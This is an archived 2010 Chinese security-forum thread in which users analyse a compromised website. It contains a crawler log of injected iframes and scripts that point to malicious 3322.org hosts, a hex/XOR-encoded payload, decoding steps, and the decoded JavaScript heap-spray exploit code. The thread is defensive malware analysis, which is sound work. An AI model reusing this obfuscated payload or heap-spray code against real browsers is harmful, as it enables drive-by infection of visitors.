瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » http://www.gzdljy.com/huadu/
青松1 - 2010-4-13 11:13:00
挂马了吗??

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.0.3705)
networkedition - 2010-4-13 11:28:00
Log is generated by FreShow.
[wide]http://www.gzdljy.com/huadu/
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
        [frame]http://asd1233.3322.org:97/xo/dk.html
            [script]http://js.tongji.linezing.com/1566155/tongji.js
            [frame]http://asd1233.3322.org:97/xo/0.htm
                [frame]http://asd1233.3322.org:97/xo/../0.htm
                    [object]http://kjy6fj.3322.org:28/www.baidu.com
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
                [script]http://asd1233.3322.org:97/xo/\"http://js.tongji.linezing.com/1549551/tongji.js\"
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/inc/rest_img.js
    [script]http://www.gzdljy.com/huadu/today.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://www.gzdljy.com/huadu/ads/js.js
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
    [script]http://nj%65%38.cn
    [script]http://n%6Ae9.%63%6E
    [script]http://v.js%67%75a%6Eg%6Ai.%63%6E
    [script]http://v%2E%74%61ogu.o%72%67.%63%6E
    [script]http://%76.%74g%32%35%30%2E%63om.%63n
青松1 - 2010-4-13 11:36:00
请版主讲讲http://asd1233.3322.org:97/xo/../0.htm
这个点解
我次次解到这不会解
青松1 - 2010-4-13 11:45:00
等待。。。。。。。
湖心小筑 - 2010-4-13 12:57:00


[复制到剪贴板]
CODE:
647360327D737A7D2F355356502537672156262737672320243539455F535A455F39352A575735291F1864736032535C5A575B2F7D737A7D39353767762776703767712B712B37672A25717637672B202B2037677625762437672A70712637677625767037672A772B2137672A742A7737672B212A7437677174762037672A25767337672A272A74376771732B20376771737173376776742B213767762676713767712A762B376776772B2137677622762037677076707637677076707635291F18647360324B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C2F677C7761717362773A5E5A535A395A5A535A394141535A397D737A39535C5A575B3B291F1865745F45507C61547067617E6160406A7C434B775C465D6A685E7F5C63767E685A46477F475F5C5D4363536466706358515360704856787F7754752F7C776532536060736B3A3B291F18647360325C5E5B5B5D73455745632F226A2A242222223F3A4B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C3C7E777C75667A38203B291F186473603276615F79767162607060675B5B71557E6263417C65475865475F4B465941642F677C7761717362773A35376722712271376722712271353B291F18657A7B7E773A76615F79767162607060675B5B71557E6263417C65475865475F4B465941643C7E777C75667A2E5C5E5B5B5D73455745633D203B691F181B76615F79767162607060675B5B71557E6263417C65475865475F4B46594164392F76615F79767162607060675B5B71557E6263417C65475865475F4B46594164291F181B1F186F647360326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B2F76615F79767162607060675B5B71557E6263417C65475865475F4B465941643C6167706166607B7C753A223E5C5E5B5B5D73455745633D203B291F1876777E7766773276615F79767162607060675B5B71557E6263417C65475865475F4B46594164291F181F1832747D603A6643797C47704167625A42707D71544A2F2229326643797C47704167625A42707D71544A2E20252229326643797C47704167625A42707D71544A39393B32691F18323265745F45507C61547067617E6160406A7C434B775C465D6A685E7F5C63767E685A46477F475F5C5D4363536466706358515360704856787F775475496643797C47704167625A42707D71544A4F322F326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B3239326A5C5C677F5A67427D7971637E63617D77715D7A715447535E7857484376645A657474505760465F7A7B65735C5A665063565E4B68607B3239324B4165426740657A445C6853535E5B406A6A7E5B48645C5F545B66626254505157717E7044755D45534B597871795A5868635D437E666565745C635D514156437E6B7C291F18326F291F18445F586058242F305C735C30294A5463755963222F305C735C3029635376615B6651202F305C735C30295C7A5163202F305C735C3029795C736B612A2F305C735C3029797B59582A2F305C735C302976757F70557B5B232F305C735C30295643635456232F305C735C30295C457C442A2F305C735C30295C535F62242F305C735C3029797B6845202F305C735C302975777E7C212F305C735C302945617B7C627A65242F305C735C3029615F477D797147232F305C735C30296663635F55262F305C735C3029


以上代码用redoce 的解密中8>HexASCII清除一次再用解密中的A>Xor(异或)密钥寻找把关键字http://改成var即可

中午太忙了代码不全造成错误不好意思
networkedition - 2010-4-13 13:22:00
此方法ms没有解密出呀:kaka2:
青松1 - 2010-4-13 14:43:00
是呀,无解出来,还是请networkedition 大版主解一次,谢谢了。
青松1 - 2010-4-13 15:04:00
版主又禁言了。
networkedition - 2010-4-13 15:10:00
我是有个解密的工具:kaka12:
zzzkkkmmm - 2010-4-13 15:20:00
我也要,
青松1 - 2010-4-13 16:10:00
搞个附件,让我们下载呀,不要这么小气哦:kaka12:
青松1 - 2010-4-13 16:14:00
好的东西就要给大家分享,期待中。。。。
湖心小筑 - 2010-4-13 16:23:00
可以解啊,只是我的代码没复制全呼呼你们自己去复制代码即可不好意思,中午忙着弄材料所以就随便复制了一下,把前面的给漏了
青松1 - 2010-4-13 16:26:00
??
湖心小筑 - 2010-4-13 16:30:00
你去5楼看看吧我重新编辑了
青松1 - 2010-4-13 16:32:00
为了防止杀软报毒,我把源代码暂时删除了。
湖心小筑 - 2010-4-13 16:33:00
其实48期悬赏也可以用这种方法解答弄到shellcode然后OD分析
青松1 - 2010-4-13 16:39:00
不可以呀
解出来是下面结果:
var oaho='ADB7E=6'+WMAHWM+'8EE';
var ANHEI=oaho+'';
var YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn=unescape(LHAH+HHAH+SSAH+oah+ANHEI);
wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg=new Array();
var NLIIOaWEWq=0x86000-(YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn.length*2);
var dsMkdcprbruIIcGlpqSnwUJwUMYTKSv=unescape('');
while(dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.length<NLIIOaWEWq/2){
dsMkdcprbruIIcGlpqSnwUJwUMYTKSv+=dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;

}var xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri=dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.substring(0,NLIIOaWEWq/2);
delete dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;

for(tQknUbSupHPbocFX=0; tQknUbSupHPbocFX<270; tQknUbSupHPbocFX++) {
wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg[tQknUbSupHPbocFX] =xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn;
};
VMJrJ6="NaN";XFqgKq0="NaN";qAdsItC2="NaN";NhCq2="NaN";kNays8="NaN";kiKJ8="NaN";dgmbGiI1="NaN";DQqFD1="NaN";NWnV8="NaN";NAMp6="NaN";kizW2="NaN";geln3="NaN";Wsinphw6="NaN";sMUokcU1="NaN";tqqMG4="NaN";
湖心小筑 - 2010-4-13 16:40:00
你加我QQ晕860880883我怎么都可以我不喜欢发贴,发贴太累还是QQ直接
1
查看完整版本: http://www.gzdljy.com/huadu/
© 2000 - 2024 Rising Corp. Ltd.